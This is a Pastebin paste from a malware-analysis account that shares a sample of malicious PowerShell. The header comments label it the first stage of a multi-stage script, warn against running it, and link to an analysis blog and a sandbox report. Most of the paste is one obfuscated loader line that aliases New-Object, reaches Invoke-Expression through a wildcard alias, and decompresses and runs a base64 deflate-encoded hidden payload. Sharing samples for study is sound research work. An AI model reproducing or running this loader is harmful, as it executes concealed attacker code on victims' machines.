Advertisement
dissectmalware

Malicious PS - Brownies

Jun 21st, 2018
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Malicious PowerShell script. Do not run on a production system (first stage)
  2. # more info:
  3. # https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/
  4. # https://twitter.com/DissectMalware/status/978920024349007873
  5. # file:
  6. # https://www.hybrid-analysis.com/sample/485515cc769bd0e2ab62e5697e743196dc6ecebd44319b1adf9e8b935a059bc3?environmentId=100
  7.  
  8. SAl S NEW-OBJecT;.(GEt-AliAS I`*X)(s IO.StREamREadeR((s IO.COmPREsSioN.DEflAtESTReAM([IO.MeMORYSTReam][CoNVERT]::FroMBASe64String('hVVpb+JIEP2+v8IaaYW9AU84EpIgtMsyzqFcCNjMjBCKGruBTuy2t7sdhkX+7/vKNuTYQfvB6uqqV0dXvW5bwvtm2ZZt2582p9nmJNvUG9mmeYQPYgvfcbaB5hASNC3StqEhEL469AA1oarDt0EmhIF7g3zrWPE1oWrC3AS6iQhN2BC2hYUcKCYWMmJtIWyDAlAtWOvkTGhKBXiLbLQnLK0n2SerNrcqk+uLuifZLOQjX4nE/BnGlWrF+y6HvS+esid33LiXxiRf+WzI/065NtMzArx38Z9v4sVCyAWiTbuHnYeRuhj0KfbPIYiw5MGFitNkEIfCX4+4MbBpGKv47mI5SGcwVEeGGeFD5XSu5nYe99zZFPG7xda94IiHQCuuRksehg0P+7Bq3/FV7X72xH1j9eMw5D7U/IGFImCGEJwnVk1bLSoXe3cweuBKi1hiA5VdJNxpx3RkmIqDXV573x9v7vu9m8fbXv/y6s5reMkonpsVUxxifi7BNcRb4atYwwT5q5BBvNJ5iVKjdMmVoMLcW/YUK6u24FazPOB5d6L4fOr2tObRLFwDbcbrhNvU17U2PIKTZAsqyn++ki+xj2bF8t0sMoR6YWF3UrSA7Lu07heRK5haT7RR8KmWcRHRoFMppw7INAxf279nrPCA/qQc4HG5tmlyy8I23c5tPy/IAvBeblUPnU5xHrcXBPY1zb3ATN329UuKBp0LDvKGAW1zwNOPBOrakMkAu7O+4sxwmzp+yfQSxCuPPnWcbDL8n37D7T/3pWw9TFp1XZuS9eMoQj5L0kX6zR87Gu4kR664x+KOxsrrQbgl4mEExAYQU3PXcH/5GQkPLKJg7SkW0qazsIDPuYwTpZlJX8RqTfkSDJPbDhU65MVuZBTPq9RiIQFVvLxUUP5Dgdxx3F8y1VOKrW1n+aY9cWSh8lSaPPUf1KOf3kQXTXtLDsLtu7UfsWEVq1Epd7JOVvBiiedFn33+vBIyotI/cLicOdXfmZRjuKObbBBbvQifD9AjU9wENT07834k4Hn98LAfSzwqKceD9Oq51420XPW5MmIu/PyFiLg0bi81cZTX5P5lRKjzUxVECwOihs9o9nHkOM4Btm4xPKLmnvexYHDmhZpvJoQBNsgHVFTzMW0v0mKXmgb2O12kx4zEX3PxXT0M8CspzDkT+XtFs6S2RrbjdPT21WuWrx647zOsxUM5RSMkX9nvrxlRHhDU0mdhOGP+c3dTjjHraFiGlAdMo6Np5Q45C8axJwP7TcJGpzD2w5g463SKqwJHSpAsk/LJeNJbieXSB4o6efPh1QsF05agC/bNIXYhv1NxnJriyQ3zPcuqkGelOvEve8NpvdGyrJqvvEFutAvt0dFBIbS3Qr1+spPaTuncbG2j2h/g7XoptE534FPrTQ2ob1vC6fEbPf4FO33j1aGST6UMdOw4v/wL'),[IO.COmPrEssION.COmpRESSIONModE]::DEcoMPReSS)),[Text.EncoDInG]::ASCII)).ReADTOEnd()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement